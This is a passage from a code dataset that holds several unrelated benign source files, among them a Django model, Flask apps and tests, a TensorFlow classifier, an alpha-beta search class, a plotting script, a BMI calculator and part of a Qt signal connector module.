   arrival_time=itinerary[\"arrival_time\"]\n                                    bus_num=itinerary[\"bus_num\"]\n                                    print(\"Take \"+bus_num+\" to \"+arrival_stop+\" at \"+departure_time+\". Your estimated time of arrival is \"+arrival_time)\n                                    break\n                                if command==EXIT:\n                                    print(\"Exiting\")\n                                    time.sleep(2)\n                                    break\n                                print(\"Sorry, that's not a valid option. Please select your preference for fewer transfers or less walking, or say exit to start over\")\n                                time.sleep(5)\n                        elif command==EXIT:\n                            print(\"Exiting\")\n                            time.sleep(2)\n                            break\n                        else:\n                            print(\"Sorry, we couldn't find your destination. Please repeat your destination or say exit to start over\")\n                            time.sleep(5)\n                    if command==EXIT:\n                        print(\"Exiting\")\n                        time.sleep(2)\n                        break\n            else:\n                print(\"Sorry that's not a valid option. 
Please choose again\")\n time.sleep(1)\n \n \n","sub_path":"Recognise_Speech_Game.py","file_name":"Recognise_Speech_Game.py","file_ext":"py","file_size_in_byte":14973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368586130","text":"from django.db import models\nimport django.utils.timezone as timezone\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Teams (models.Model):\n name = models.CharField('队伍名',default='队伍名',max_length=10)\n description = models.CharField(default='在这里写队伍简介',max_length=100)\n image = models.ImageField('队伍头像',default='default.png',upload_to='images/')\n leader = models.ForeignKey(User,on_delete=models.CASCADE)\n email = models.EmailField('队长邮箱',max_length=50)\n mate1 = models.CharField('队员1',default='队员1', max_length=20)\n m1 = models.CharField('队员1联系方式', default='10086', max_length=20)\n mate2 = models.CharField('队员2',default='队员2', max_length=20)\n m2 = models.CharField('队员2联系方式', default='10086', max_length=20)\n mate3 = models.CharField('队员3',default='队员3', max_length=20)\n m3 = models.CharField('队员3联系方式', default='10086', max_length=20)\n mate4 = models.CharField('队员4',default='队员4', max_length=20)\n m4 = models.CharField('队员4联系方式', default='10086', max_length=20)\n mate5 = models.CharField('队员5',default='队员5', max_length=20)\n m5 = models.CharField('队员5联系方式', default='10086', max_length=20)\n add_date = models.DateTimeField('保存日期', default=timezone.now)\n mod_date = models.DateTimeField('最后修改日期', auto_now=True)\n def __str__(self):\n return self.name","sub_path":"teams/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"602422242","text":"#!/usr/bin/env python3 -B\nimport unittest\n\nfrom cromulent import vocab\n\nfrom tests import TestSalesPipelineOutput, classification_sets\n\nvocab.add_attribute_assignment_check()\n\nclass PIRModelingTest_AR120(TestSalesPipelineOutput):\n def test_modeling_ar120(self):\n '''\n AR-120: Add bid records when no price indicated in a sales record.\n '''\n output = self.run_pipeline('ar120')\n texts = output['model-lo']\n activities = output['model-activity']\n \n prov1 = activities['tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#PROV,B-A15,1739-07-20,0233']\n assignments1 = [p for p in prov1.get('part', []) if p['type'] == 'AttributeAssignment']\n self.assertEqual(len(assignments1), 1)\n assignment1 = assignments1[0]\n self.assertEqual(assignment1['_label'], 'Bidding valuation of B-A15 0233 1739-07-20')\n self.assertEqual(classification_sets(assignment1), {'Bidding'})\n self.assertNotIn('assigned', assignment1)\n buyers1 = assignment1.get('carried_out_by', [])\n self.assertEqual(len(buyers1), 1) # bought-in, so no buyer data\n buyer1 = buyers1[0]\n self.assertEqual(buyer1['_label'], 'Servees')\n\n prov2 = activities['tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#PROV,Br-A1875,1792-02-18,0008']\n assignments2 = [p for p in prov2.get('part', []) if p['type'] == 'AttributeAssignment']\n self.assertEqual(len(assignments2), 1)\n assignment2 = assignments2[0]\n self.assertEqual(assignment2['_label'], 'Bidding valuation of Br-A1875 0008 1792-02-18')\n self.assertEqual(classification_sets(assignment2), {'Bidding'})\n self.assertNotIn('assigned', assignment2)\n buyers2 = assignment2.get('carried_out_by', [])\n self.assertEqual(len(buyers2), 1) # bought-in, so no buyer data\n buyer2 = 
buyers2[0]\n self.assertEqual(buyer2['_label'], 'Skirrow')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_sales_issue_ar120.py","file_name":"test_sales_issue_ar120.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410156599","text":"import tensorflow\nimport itertools\nimport random\n\nfrom time import time\n\nclass ClassifiedNumber:\n \n def __init__(self, number):\n \n self.__number = number\n \n if number == 0:\n self.__classifiedAs = 0 # zero\n \n elif number > 0:\n self.__classifiedAs = 1 # positive\n \n elif number < 0:\n self.__classifiedAs = 2 # negative\n \n def number(self):\n return self.__number\n \n def classifiedAs(self):\n return self.__classifiedAs\n \ndef classifiedAsString(classifiedAs):\n \n if classifiedAs == 0:\n return \"Zero\"\n \n elif classifiedAs == 1:\n return \"Positive\"\n \n elif classifiedAs == 2:\n return \"Negative\"\n\ndef trainDatasetFunction():\n \n trainNumbers = []\n trainNumberLabels = []\n \n for i in range(-1000, 1001): \n number = ClassifiedNumber(i)\n trainNumbers.append(number.number())\n trainNumberLabels.append(number.classifiedAs())\n \n return ( {\"number\" : trainNumbers } , trainNumberLabels )\n\ndef inputDatasetFunction():\n \n global randomSeed\n random.seed(randomSeed) # to get same result\n \n numbers = []\n \n for i in range(0, 4):\n numbers.append(random.randint(-9999999, 9999999))\n \n return {\"number\" : numbers }\n \ndef main():\n \n print(\"TensorFlow Positive-Negative-Zero numbers classifier test by demensdeum 2017 (demensdeum@gmail.com)\")\n \n maximalClassesCount = len(set(trainDatasetFunction()[1])) + 1\n \n numberFeature = tensorflow.feature_column.numeric_column(\"number\")\n classifier = tensorflow.estimator.DNNClassifier(feature_columns = [numberFeature], hidden_units = [10, 20, 10], n_classes = maximalClassesCount)\n generator = classifier.train(input_fn = trainDatasetFunction, steps = 1000).predict(input_fn = inputDatasetFunction)\n \n inputDataset = inputDatasetFunction()\n \n results = list(itertools.islice(generator, len(inputDatasetFunction()[\"number\"])))\n \n i = 0\n for result in results:\n print(\"number: %d classified as %s\" % (inputDataset[\"number\"][i], classifiedAsString(result[\"class_ids\"][0])))\n i += 1\n\nrandomSeed = time()\n\nmain()","sub_path":"1numberClassifier/numberClassifier.py","file_name":"numberClassifier.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199088457","text":"from flask import Flask, json, jsonify\nimport db\nimport json\n\napp = Flask(__name__)\n \n@app.route(\"/\")\ndef hello():\n with open(\"data.json\") as fh:\n data = json.load(fh)\n\n return jsonify(data)\n\nif __name__ == \"__main__\":\n #db.process_db()\n app.run(debug=True)\n \n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640721510","text":"from datetime import timedelta\nfrom unittest import mock\n\nimport pytest\nfrom django.utils import timezone\n\nfrom configuration import sitemaps\nfrom zine import models\n\n\n@pytest.fixture\ndef get_sitemap_class():\n def _get_sitemap_class(sitemap_type):\n return {\n 'issue': sitemaps.IssueSitemap,\n 'article': sitemaps.ArticleSitemap,\n 'miscellaneous': sitemaps.MiscellaneousPageSitemap,\n 
}.get(sitemap_type)\n return _get_sitemap_class\n\n\n@pytest.fixture\ndef example_pages():\n return [\n 'someapp:somepage',\n 'someotherapp:somepage',\n ]\n\n\n@pytest.mark.django_db\nclass TestIssueSiteMap:\n def test_issue_sitemap_when_no_issues(self, get_sitemap_class):\n sitemap = get_sitemap_class('issue')()\n assert list(sitemap.items()) == []\n\n def test_issue_sitemap_when_no_published_issues(self, get_sitemap_class):\n sitemap = get_sitemap_class('issue')()\n\n models.Issue.objects.create(\n title='Unpublished Issue',\n slug='unpublished-issue',\n publication_date=timezone.now() + timedelta(hours=1),\n synopsis='An unpublished issue',\n )\n assert list(sitemap.items()) == []\n\n def test_issue_sitemap_when_published_issues(self, get_sitemap_class):\n sitemap = get_sitemap_class('issue')()\n\n issue = models.Issue.objects.create(\n title='Published Issue',\n slug='published-issue',\n publication_date=timezone.now(),\n synopsis='A published issue',\n )\n assert issue in sitemap.items()\n assert sitemap.lastmod(issue) == issue.updated_time\n\n\n@pytest.mark.django_db\nclass TestArticleSiteMap:\n def test_article_sitemap_when_no_articles(self, get_sitemap_class):\n sitemap = get_sitemap_class('article')()\n assert list(sitemap.items()) == []\n\n def test_article_sitemap_when_no_published_articles(self, get_sitemap_class):\n sitemap = get_sitemap_class('article')()\n\n issue = models.Issue.objects.create(\n title='Unpublished Issue',\n slug='unpublished-issue',\n publication_date=timezone.now() + timedelta(hours=1),\n synopsis='An unpublished issue',\n )\n\n models.Article.objects.create(\n title='Unpublished Article',\n slug='unpublished-article',\n issue=issue,\n synopsis='An unpublished issue',\n )\n\n assert list(sitemap.items()) == []\n\n def test_article_sitemap_when_published_articles(self, get_sitemap_class):\n sitemap = get_sitemap_class('article')()\n\n issue = models.Issue.objects.create(\n title='Unpublished Issue',\n slug='unpublished-issue',\n publication_date=timezone.now(),\n synopsis='An unpublished issue',\n )\n\n article = models.Article.objects.create(\n title='Unpublished Article',\n slug='unpublished-article',\n issue=issue,\n synopsis='An unpublished issue',\n )\n\n assert article in sitemap.items()\n assert sitemap.lastmod(article) == article.updated_time\n\n\n@pytest.mark.django_db\nclass TestMiscellaneousPagesSitemap:\n def test_lastmod(self, get_sitemap_class, example_pages):\n sitemap = get_sitemap_class('miscellaneous')(example_pages)\n\n expected = timezone.now()\n actual = sitemap.lastmod(None)\n assert (actual.year, actual.month, actual.day, actual.hour, actual.minute) == (expected.year, expected.month, expected.day, expected.hour, expected.minute)\n\n def test_location(self, get_sitemap_class, example_pages):\n sitemap = get_sitemap_class('miscellaneous')(example_pages)\n\n for name in sitemap.names:\n with mock.patch('configuration.sitemaps.reverse') as mock_reverse:\n sitemap.location(name)\n mock_reverse.assert_called_once_with(name)\n\n def test_items(self, get_sitemap_class, example_pages):\n sitemap = get_sitemap_class('miscellaneous')(example_pages)\n assert sitemap.items() == example_pages\n","sub_path":"configuration/tests/test_sitemaps.py","file_name":"test_sitemaps.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"79004349","text":"#!/usr/bin/python\nimport numpy as np\nimport pylab as py\nfrom COMMON import 
nanosec,yr,week,grav,msun,light,mpc,hub0,h0,omm,omv\nfrom scipy import integrate\nimport COMMON as CM\nimport pyPdf,os\nfrom matplotlib import colors\nfrom USEFUL import time_estimate\nfrom scipy.interpolate import interp1d\nimport Formulas_AjithEtAl2008 as A8\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n#Input parameters:\nfrom INPUT_PARAMETERS import *\ncb_width=0.014\ncb_height=0.81\nleft, right, top, bottom, cb_fraction=0.065, 0.929, 0.97, 0.16, 0.08 #Borders of the plot.\nmaxsnrlevel=3.2 #Maximum S/N level in the colorbar.\nminsnrlevel=np.log10(snrt) #Minimum one.\nsnrlevels=8\noutputplot='../plots/z_vs_f_EPTA_ALL_'+flim_model+'.png'\ninputdatadir='../data/output/SNR_z_vs_f_EPTA_A8/' #Input directory.\n#-----------------------------------------------------------------\n\n#Optimal plotting options.\n#import PARAMETER_PLOTS\n#Choose plotting options that look optimal for the paper.\nfig_width = 3.4039*2.\nfig_height = fig_width * 0.32\nsizepoints=9\nlegendsizepoints=7\npy.rcParams.update({\n\t'backend': 'ps',\n\t'ps.usedistiller': 'xpdf',\n\t'text.usetex': True,\n\t'figure.figsize': [fig_width, fig_height],\n\t'axes.titlesize': sizepoints,\n\t'axes.labelsize': sizepoints,\n\t'text.fontsize': sizepoints,\n\t'xtick.labelsize': sizepoints,\n\t'ytick.labelsize': sizepoints,\n\t'legend.fontsize': legendsizepoints\n})\n\n#Identify masses.\nplotfiles=np.array(os.listdir(inputdatadir))\nmchvec=[]\nmchfiles=[]\nfor mi in xrange(len(plotfiles)):\n\tif plotfiles[mi][-4:]!='.npy':\n\t\tcontinue\n\tmchvec.append(np.log10(eval(plotfiles[mi][3:-4])))\n\tmchfiles.append(plotfiles[mi])\nindisort=np.array(mchvec).argsort()\nmchvec=np.array(mchvec)[indisort]\nmchfiles=np.array(mchfiles)[indisort]\n\n#Create 3 plots.\nfig, axes = plt.subplots(nrows = 1, ncols = 3)\nfig.subplots_adjust(left=left,right=right,top=top,bottom=bottom)\n\nlevels=np.linspace(minsnrlevel, maxsnrlevel, snrlevels)\n\nfor mi in xrange(len(mchfiles)):\n\tmchi=mchvec[mi]\n\tmch=10**(mchi) #Chirp mass of the BH binary.\n\tm=mch*2**(1./5.) 
#Mass of each individual BH, assuming equal masses.\n\tnu=CM.nu_f(m,m) #Symmetric mass ratio.\n\tmtot=2.*m #Total mass.\n\n\tax=axes[mi]\n\n\t#Modify axes and ticks.\n\tax.set_yscale('log')\n\tax.set_xscale('log')\n\n\t#Load data.\n\tdata=np.load(inputdatadir+mchfiles[mi])[()]\n\tsnr_final_mat=data['snr_mat']\n\tf_mat=data['f_mat']\n\tz_mat=data['z_mat']\n\tz_app=data['z_app']\n\n\tlso_mat=np.zeros(np.shape(z_mat))\n\tif flim_model=='ISCO':\n\t\tflim_mat=CM.felso(m, m)*1./(1.+z_mat)\n\telif flim_model=='A8':\n\t\tflim_mat=A8.f_cut(nu, mtot)*1./(1.+z_mat)\n\t\tlso2_mat=np.zeros(np.shape(z_mat))\n\t\tlso2_mat[f_mat>=CM.felso(m, m)*1./(1.+z_mat)]=1 #I decide to plot the ISCO line in any case\n\tsnr_final_mat[snr_final_mat<=0.]=np.nan\n\tsnr_final_mat[snr_final_mat>0.]=np.log10(snr_final_mat[snr_final_mat>0.])\n\n\tlso_mat[f_mat>=flim_mat]=1\n\t\n\tcmap = colors.ListedColormap(['white','black'])\n\tax.contourf(f_mat, z_mat, lso_mat, origin='lower', interpolation='None', aspect='auto',alpha=0.5, cmap=cmap)\n\tax.set_xscale('log')\n\tax.set_yscale('log')\n\t#cmap = colors.ListedColormap(['red'])\n\tax.contourf(f_mat, z_mat, lso2_mat, origin='lower', interpolation='None', aspect='auto',alpha=0.5, cmap=cmap)\n\tcmap=py.cm.winter\n\tsnrmap=ax.contourf(f_mat, z_mat, snr_final_mat, origin='lower', interpolation='None', aspect='auto', alpha=0.5, cmap=cmap, levels=levels)\n\n\tcmap = colors.ListedColormap(['white', 'red'])\n\tsnr_final_mat_t=snr_final_mat.copy()\n\tsnr_final_mat_t[10**(snr_final_mat) < snrt]=0\n\tsnr_final_mat_t[10**(snr_final_mat) >= snrt]=10\n\tax.contourf(f_mat, z_mat, snr_final_mat_t, origin='lower', interpolation='None', aspect='auto', alpha=0.5, cmap=cmap, levels=[0., 5.])\n\n\tcmap = colors.ListedColormap(['black'])\n\tax.contour(f_mat, z_mat, snr_final_mat, origin='lower', interpolation='None', aspect='auto', alpha=0.2, cmap=cmap, levels=levels)\n\tax.contour(f_mat, z_mat, z_app, origin='lower', interpolation='None', aspect='auto',cmap=cmap, levels=[0])\n\n\t#cb = fig.colorbar(snrmap,fraction=cb_fraction,format='$%i$', ticks=[-2., -1., 0., 1., 2., 3., 4.])\n\n\tif mi==0:\n\t\tax.set_ylabel('$\\log_{10}(\\\\mathrm{Redshift})$')\n\telif mi==1:\n\t\tax.set_xlabel('$\\log_{10}(\\\\mathrm{Initial\\ GW\\ observed\\ frequency\\ /\\ Hz})$')\n\tax.set_xlim(np.amin(f_mat), np.amax(f_mat))\n\tax.set_ylim(minreds, maxreds)\n\tax.set_xticks([1e-9,1e-8,1e-7])\n\tax.set_xticklabels([\" \",\"$-8$\",\"$-7$\"])\n\tax.set_yticks([1e-2,1e-1,1e0,1e1,1e2, 1e3])\n\tax.set_yticklabels([\"$-2$\",\"$-1$\",\"$0$\",\"$1$\",\"$2$\",\"$3$\"])\n\t#cb.set_label('$\\\\log_{10}(\\\\mathrm{S/N})$')\n\t#ax.text(xmin*2,ymin*2,'$10^{%.1f}M_{\\\\odot}$'%mchi,fontsize=9)\n\nfor ax in (axes[1], axes[2]):\n\tpy.setp(ax.get_yticklabels(), visible=False)\n\n#py.tight_layout() #This resizes the plots in a particular way, disregarding left, right, top, bottom.\nplt.subplots_adjust(wspace = 0.02) #Whitespace between each subplot.\n\n#fig.subplots_adjust(right=0.85)\ncbar_ax = fig.add_axes([right*1.01, bottom, cb_width, cb_height])\nfig.colorbar(snrmap, cax=cbar_ax, format='$%i$', ticks=[1., 2., 3.]).set_label('$\\\\log_{10}(\\\\mathrm{S/N})$')\n\nfig.savefig(outputplot, dpi=600)\n","sub_path":"more/PLOT_PAPER_z_vs_f.py","file_name":"PLOT_PAPER_z_vs_f.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364608470","text":"class AlphaBetaDetective:\n    \n    def __init__(self, root):\n        self.root = root # GameNode\n        return\n\n    def alpha_beta_search(self, node):\n        infinity = 
float('inf')\n        # the root acts as the minimizing player: alpha starts at -infinity\n        # and beta tracks the best (lowest) value found so far\n        best_val = infinity\n        alpha = -infinity\n\n        successors = self.getSuccessors(node)\n        best_state = None\n        for state in successors:\n            value = self.max_value(state, alpha, best_val)\n            if value < best_val:\n                best_val = value\n                best_state = state\n        return best_state\n\n    def max_value(self, node, alpha, beta):\n        if self.isTerminal(node):\n            return self.getUtility(node)\n        infinity = float('inf')\n        value = -infinity\n\n        successors = self.getSuccessors(node)\n        for state in successors:\n            value = max(value, self.min_value(state, alpha, beta))\n            if value >= beta:\n                return value\n            alpha = max(alpha, value)\n        return value\n\n    def min_value(self, node, alpha, beta):\n        if self.isTerminal(node):\n            return self.getUtility(node)\n        infinity = float('inf')\n        value = infinity\n\n        successors = self.getSuccessors(node)\n        for state in successors:\n            value = min(value, self.max_value(state, alpha, beta))\n            if value <= alpha:\n                return value\n            beta = min(beta, value)\n\n        return value\n\n    def getSuccessors(self, node):\n        assert node is not None\n        return node.child\n\n    def isTerminal(self, node):\n        assert node is not None\n        return len(node.child) == 0\n\n    def getUtility(self, node):\n        assert node is not None\n        return node.score","sub_path":"AlphaBeta/AlphaBetaDetective.py","file_name":"AlphaBetaDetective.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123580561","text":"import pytest\n\nfrom unittest.mock import patch\n\nfrom flask import Flask\n\nfrom bas_web_map_inventory import create_app\n# TestingConfig is renamed to prevent PyTest trying to test the class\nfrom bas_web_map_inventory.config import Config, TestingConfig as _TestingConfig\n\n\n@pytest.mark.usefixtures('app')\ndef test_app(app):\n    assert app is not None\n    assert isinstance(app, Flask)\n\n\n@pytest.mark.usefixtures('app')\ndef test_app_environment(app):\n    assert app.config['TESTING'] is True\n\n\ndef test_app_no_environment():\n    with patch('bas_web_map_inventory._create_app_config') as mock_create_app_config:\n        config = Config()\n        mock_create_app_config.return_value = config\n\n        app = create_app()\n        assert app is not None\n        assert isinstance(app, Flask)\n        assert app.config['TESTING'] is False\n\n\ndef test_app_enable_log_file():\n    with patch('bas_web_map_inventory._create_app_config') as mock_create_app_config:\n        config = _TestingConfig()\n        config.APP_ENABLE_FILE_LOGGING = True\n        mock_create_app_config.return_value = config\n\n        app = create_app()\n        assert app is not None\n        assert isinstance(app, Flask)\n        assert app.config['TESTING'] is True\n        assert app.config['APP_ENABLE_FILE_LOGGING'] is True\n\n\ndef test_app_enable_sentry():\n    with patch('bas_web_map_inventory._create_app_config') as mock_create_app_config:\n        config = _TestingConfig()\n        config.APP_ENABLE_SENTRY = True\n        mock_create_app_config.return_value = config\n\n        app = create_app()\n        assert app is not None\n        assert isinstance(app, Flask)\n        assert app.config['TESTING'] is True\n        assert app.config['APP_ENABLE_SENTRY'] is True\n\n\n@pytest.mark.usefixtures('app_runner')\ndef test_cli_help(app_runner):\n    result = app_runner.invoke(args=['--help'])\n    assert 'Show this message and exit.' 
in result.output\n\n\n@pytest.mark.usefixtures('app_runner')\ndef test_cli_version(app_runner):\n    result = app_runner.invoke(args=['version'])\n    assert 'Version: N/A' in result.output\n","sub_path":"tests/bas_web_map_inventory/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496957632","text":"H = float(input('请输入您的身高,单位为m'))\r\nW = float(input('请输入你的体重,单位为kg'))\r\nBMI = W /(H * H)\r\nprint('您的BMI值为%.2f'%(BMI))\r\nstatus = '肥胖'\r\nif(BMI < 18.5):\r\n    status = '偏瘦'\r\nelif(BMI < 25):\r\n    status = '正常'\r\nelif(BMI < 30):\r\n    status = '偏胖'\r\nprint('您处于{}的状态'.format(status))\r\nprint('正常体重的BMI值应该处于18.5与25之间')\r\nprint('建议您将体重维持在%.2fkg与%.2fkg之间'%(18.5*H*H,25*H*H))\r\n","sub_path":"python/code/BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"194250346","text":"# Class for exercise class subclass of exercise\nfrom exercise import Exercise\nfrom random import randint\n\n\nclass ExerciseClass(Exercise):\n\n    def __init__(self,duration=10, bodyGroup='Total Body', instructor='Unknown', classType='Spin Class'):\n\n        Exercise.__init__(self, duration, bodyGroup)\n        self.instructor = instructor\n        self.type = classType\n\n\n    def test(self):\n        Exercise.test(self)\n        print(\"Exercise Class\")\n        print(self.instructor)\n        print(self.type)\n        \n\n\n# ex = ExerciseClass(duration = 20, bodyGroup='Arms')\n# ex.test()\n# ex2 = ExerciseClass(instructor='Jessica Hayes', classType='KickBoxing')\n# ex2.test()\n\n","sub_path":"exerciseclass.py","file_name":"exerciseclass.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287654519","text":"# this project is licensed under the WTFPLv2, see COPYING.txt for details\n\n\"\"\"Connector for signals and slots of categories.\n\n.. _connector:\n\nConnector\n---------\n\nIn Qt, a signal of an object can be connected to the slot of another object, so when the signal of this object\nis emitted, the slot of that object is called. However, the connections are individual: even though a signal\nexists for a whole class of objects, it's not possible to connect the signal of all objects of a class to one slot.\n\nIn EYE, the connector allows connecting a signal of all existing objects matching a category (see :ref:`categories`)\nas well as future objects matching this category, to a function.\n\n.. _categories:\n\nCategories\n----------\n\nA category is a string tag attached to an object. 
An object can have multiple categories.\nCategories can be added to/removed from an object dynamically, though often the categories\nwill be set when the object is created.\nSince the connector (see :ref:`connector`) allows automatic connection of many objects to a function, categories\nallow finer grained control of what objects should be connected than if the class of the objects was the only\ncriterion of connection.\n\nExample\n-------\n\nAll objects of the class :class:`eye.widgets.Editor` have by default the category ``\"editor\"`` and that class has the\n``fileSaved = Signal(str)`` signal, where the first argument is the path of the saved file.\nWhen configuring EYE (see :doc:`configuration`), it's possible to add this code::\n\n\tfrom eye.connector import registerSignal\n\n\t@registerSignal('editor', 'fileSaved')\n\tdef foo(editor_obj, path):\n\t\tprint('file %s was saved' % path)\n\nWe connect the ``fileSaved`` signal all objects having the category ``\"editor\"`` to the ``foo`` callback, which will\nreceive multiple arguments, first the object which sent the signal, and then the arguments of the ``fileSaved`` signal.\nWhen a new Editor widget will be created, it will automatically be connected to our callback, so when any editor will be\nsaved, ``foo`` will be called.\n\nModule contents\n---------------\n\"\"\"\n\nimport inspect\nfrom logging import getLogger\nimport weakref\n\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtWidgets import QWidget\n\nfrom .qt import Signal, Slot\nfrom .three import bytes, str\nfrom .utils import exceptionLogging\nfrom . import BUILDING_DOCS, _addDoc\n\n__all__ = ('registerSignal', 'registerEventFilter', 'disabled',\n 'registerSetup', 'registerTeardown',\n 'deleteCreatedBy',\n 'defaultEditorConfig', 'defaultWindowConfig', 'defaultLexerConfig',\n 'categoryObjects', 'CategoryMixin')\n\n\nLOGGER = getLogger(__name__)\n\n\ndef to_stringlist(obj):\n\tif isinstance(obj, (str, bytes)):\n\t\treturn [obj]\n\telse:\n\t\treturn obj\n\n\nclass ListenerMixin(object):\n\tdef unregister(self):\n\t\tobjects = CONNECTOR.objectsMatching(self.categories)\n\t\tfor obj in objects:\n\t\t\tself.doDisconnect(obj)\n\n\nclass SignalListener(QObject, ListenerMixin):\n\tdef __init__(self, cb, categories, signal, parent=None):\n\t\tsuper(SignalListener, self).__init__(parent)\n\t\tself.cb = cb\n\t\tself.categories = categories\n\t\tself.signal = signal\n\t\tself.caller = None\n\n\t@Slot(int)\n\t@Slot(str)\n\t@Slot(bytes)\n\t@Slot(QObject)\n\t@Slot(QWidget)\n\t@Slot(object)\n\t@Slot(int, int)\n\t@Slot(str, str)\n\t@Slot(int, str)\n\t@Slot(str, int)\n\t@Slot(str, object)\n\t@Slot(object, object)\n\t@Slot()\n\tdef map(self, *args, **kwargs):\n\t\tif not getattr(self.cb, 'enabled', True):\n\t\t\treturn\n\n\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\tsender = kwargs.get('sender', self.sender())\n\t\t\tself.cb(sender, *args)\n\n\tdef doConnect(self, obj):\n\t\tgetattr(obj, self.signal).connect(self.map)\n\n\tdef doDisconnect(self, obj):\n\t\tgetattr(obj, self.signal).disconnect(self.map)\n\n\nclass ConnectListener(ListenerMixin):\n\tdef __init__(self, cb, categories, parent=None):\n\t\tsuper(ConnectListener, self).__init__()\n\t\tself.cb = cb\n\t\tself.categories = categories\n\t\tself.caller = None\n\n\tdef map(self, obj):\n\t\tif getattr(self.cb, 'enabled', True):\n\t\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\t\tself.cb(obj)\n\n\nclass SetupListener(ConnectListener):\n\tdef doConnect(self, obj):\n\t\tself.map(obj)\n\n\tdef doDisconnect(self, 
obj):\n\t\tpass\n\n\nclass TearListener(ConnectListener):\n\tdef doConnect(self, obj):\n\t\tpass\n\n\tdef doDisconnect(self, obj):\n\t\tself.map(obj)\n\n\nclass EventFilter(QObject, ListenerMixin):\n\tdef __init__(self, cb, categories, eventTypes, parent=None):\n\t\tsuper(EventFilter, self).__init__(parent)\n\t\tself.cb = cb\n\t\tself.categories = categories\n\t\tself.eventTypes = eventTypes\n\t\tself.caller = None\n\n\tdef eventFilter(self, obj, ev):\n\t\tret = False\n\t\tif getattr(self.cb, 'enabled', True) and ev.type() in self.eventTypes:\n\t\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\t\tret = bool(self.cb(obj, ev))\n\t\treturn ret\n\n\tdef doConnect(self, obj):\n\t\tobj.installEventFilter(self)\n\n\tdef doDisconnect(self, obj):\n\t\tobj.removeEventFilter(self)\n\n\nclass EventConnector(QObject):\n\tcategoryAdded = Signal(object, str)\n\tcategoryRemoved = Signal(object, str)\n\n\tdef __init__(self):\n\t\tsuper(EventConnector, self).__init__()\n\t\tself.allObjects = weakref.WeakSet()\n\t\tself.allListeners = []\n\n\tdef doConnect(self, obj, lis, cats=None):\n\t\tLOGGER.debug('connecting %r to %r (from file %r) in %r categories', obj, lis.cb, inspect.getfile(lis.cb), cats)\n\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\tlis.doConnect(obj)\n\n\tdef doDisconnect(self, obj, lis, cats=None):\n\t\tLOGGER.debug('disconnecting %r to %r (from file %r) in %r categories', obj, lis.cb, inspect.getfile(lis.cb), cats)\n\t\twith exceptionLogging(reraise=False, logger=LOGGER):\n\t\t\tlis.doDisconnect(obj)\n\n\tdef addListener(self, categories, lis):\n\t\tself.allListeners.append(lis)\n\n\t\t# iterate on list copy to avoid concurrent access\n\t\tfor obj in list(self.allObjects):\n\t\t\tif categories <= obj.categories():\n\t\t\t\tself.doConnect(obj, lis, categories)\n\n\tdef addObject(self, obj):\n\t\tself.allObjects.add(obj)\n\n\t\toc = obj.categories()\n\t\tif not oc:\n\t\t\treturn\n\n\t\tfor lis in self.allListeners:\n\t\t\tif lis.categories <= oc:\n\t\t\t\tself.doConnect(obj, lis, lis.categories)\n\n\tdef addCategory(self, obj, cat):\n\t\toc = obj.categories()\n\n\t\tfor lis in self.allListeners:\n\t\t\tif lis.categories:\n\t\t\t\tif cat in lis.categories and lis.categories <= oc:\n\t\t\t\t\tself.doConnect(obj, lis, cat)\n\t\t\telif len(obj.categories()) == 1:\n\t\t\t\tself.doConnect(obj, lis, cat)\n\t\tself.categoryAdded.emit(obj, cat)\n\n\tdef removeCategory(self, obj, cat):\n\t\tfor lis in self.allListeners:\n\t\t\tif cat in lis.categories:\n\t\t\t\tself.doDisconnect(obj, lis, cat)\n\t\tself.categoryRemoved.emit(obj, cat)\n\n\tdef objectsMatching(self, categories):\n\t\tcategories = frozenset(to_stringlist(categories))\n\t\treturn [obj for obj in self.allObjects if categories <= obj.categories()]\n\n\tdef deleteCreatedBy(self, caller):\n\t\t\"\"\"Unregister listeners registered in file `caller`.\"\"\"\n\t\tnewListeners = []\n\t\tfor lis in self.allListeners:\n\t\t\tif lis.caller == caller:\n\t\t\t\tlis.unregister()\n\t\t\telse:\n\t\t\t\tnewListeners.append(lis)\n\t\tself.allListeners = newListeners\n\n\nclass CategoryMixin(object):\n\t\"\"\"Mixin class to support object categories.\n\n\tThis class should be inherited by classes of objects which should have categories.\n\t\"\"\"\n\n\tdef __init__(self, **kwargs):\n\t\tsuper(CategoryMixin, self).__init__(**kwargs)\n\t\tself._categories = 